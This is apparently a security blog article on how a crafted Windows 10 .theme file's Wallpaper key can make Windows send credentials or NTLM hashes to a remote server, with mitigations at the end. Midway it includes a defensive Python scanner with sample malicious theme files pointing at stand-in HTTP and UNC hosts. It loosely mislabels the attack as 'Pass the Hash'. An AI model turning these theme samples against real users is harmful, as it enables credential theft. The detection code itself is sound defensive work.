Windows 10 Themes Can Now Steal User Credentials

Custom Windows 10 themes can steal account information from their victims

What is Credential Harvesting?

Also known as password harvesting, credential harvesting is the use of man-in-the-middle (MITM) attacks, DNS poisoning, phishing, and other vectors to amass large numbers of credentials (usernames and passwords) for reuse.

Credential harvesting takes many forms, of which “classic” email phishing armed with links to bogus websites or malicious attachments is just one. Social engineering techniques, digital scams, and malware may each be used, alone or in combination, to steal credentials.

How Does The Windows 10 Theme Attack Work?

Windows lets users share themes via the Settings UI: right-click the currently active theme under Personalization > Themes and click “Save theme for sharing”. This creates a ‘.deskthemepack’ file, which can then be downloaded and installed by other users.

In a Windows .theme file, the Wallpaper key can be configured to point to a remote HTTP or HTTPS resource that requires authentication. When a user activates the theme file (e.g. by opening it from a link or attachment), Windows displays a credential prompt to the user.

The hacker sets up their website so that it asks for the user’s Windows 10 credentials when the user connects to it. When the user applies the theme, the user’s computer goes to fetch the wallpaper from the hacker’s website. The website tells the user’s computer that it requires remote-access credentials, and Windows then asks the user to enter their credentials to gain access to the image.

As the user enters their username and password, the resulting hash strings are sent to the hacker’s server.

The Wallpaper key is located under the “Control Panel\Desktop” section of the .theme file. Other keys may be usable in the same manner, and the same approach may also disclose NetNTLM hashes when the key is set to a remote file location.
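As a defender-side check, here is a small scanner added as an example (not code from the researcher or from Microsoft) that parses the INI-style text of a .theme file and flags a Wallpaper value under [Control Panel\Desktop] that points off-host over HTTP(S) or a UNC path. The sample theme contents and hostnames are constructed for the example, and it assumes the .theme text has already been extracted from any .deskthemepack container.

```python
import configparser
import re
from urllib.parse import urlsplit

# Constructed sample .theme contents for this example (not files from the page).
# The first follows the pattern described above: the Wallpaper value under
# [Control Panel\Desktop] points at a remote HTTP resource.
SUSPICIOUS_THEME = """\
[Theme]
DisplayName=Quarterly Report Theme
[Control Panel\\Desktop]
Wallpaper=http://wallpaper-cdn.example.invalid/backgrounds/report.jpg
"""

# A UNC path has the same effect: Windows authenticates to the file server.
UNC_THEME = """\
[Control Panel\\Desktop]
Wallpaper=\\\\fileshare.example.invalid\\themes\\bg.jpg
"""

BENIGN_THEME = """\
[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\Web\\Wallpaper\\Windows\\img0.jpg
"""

# Values that make the shell fetch the image from another host: URLs and UNC paths.
REMOTE_PATTERN = re.compile(r"^(?:https?://|\\\\[^\\]+\\)", re.IGNORECASE)
# Keys to inspect; the page names Wallpaper (extending the set is an assumption).
WATCHED_KEYS = {"wallpaper"}


def find_remote_resources(theme_text: str) -> list:
    """Return (section, key, value) for every watched key whose value is off-host."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key case as written in the file
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            value = value.strip()
            if key.lower() in WATCHED_KEYS and REMOTE_PATTERN.match(value):
                hits.append((section, key, value))
    return hits


def remote_host(value: str) -> str:
    """Return the host a flagged value would make Windows contact, for triage."""
    if value.startswith("\\\\"):
        return value.lstrip("\\").split("\\", 1)[0]
    return urlsplit(value).hostname or ""
```

A hit from find_remote_resources is a reason to quarantine the theme before it is applied; remote_host gives the hostname to check against proxy and DNS logs.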

This “Pass the Hash” attack doesn’t steal your password right away, but rather the password hash: a hashed, non-plaintext form of your password. Passwords are hashed so that they are not stored in the clear on remote servers, but these hash strings can be cracked with readily available software.

Cracking an NTLM password hash in four seconds (Source: Bleeping Computer)

Windows 10 login credentials are usually a Microsoft account name and password. This attack therefore doesn’t just allow the hacker to gain access to a PC, but also to the victim’s Microsoft account as a whole.

This vulnerability was discovered by Jimmy Bayne, a cybersecurity researcher who published a chain of tweets explaining how the attack works.

Source: Jimmy Bayne

Staying Safe

Windows users can configure the group policy named ‘Network security: Restrict NTLM: Outgoing traffic’ by setting it to ‘Deny All’. This stops your credentials from being sent to remote hosts. Note that it also blocks legitimate NTLM authentication to remote servers, so test the setting before rolling it out broadly.

Further, add multi-factor authentication to your Microsoft accounts, so that attackers who successfully steal your credentials still cannot access the account remotely.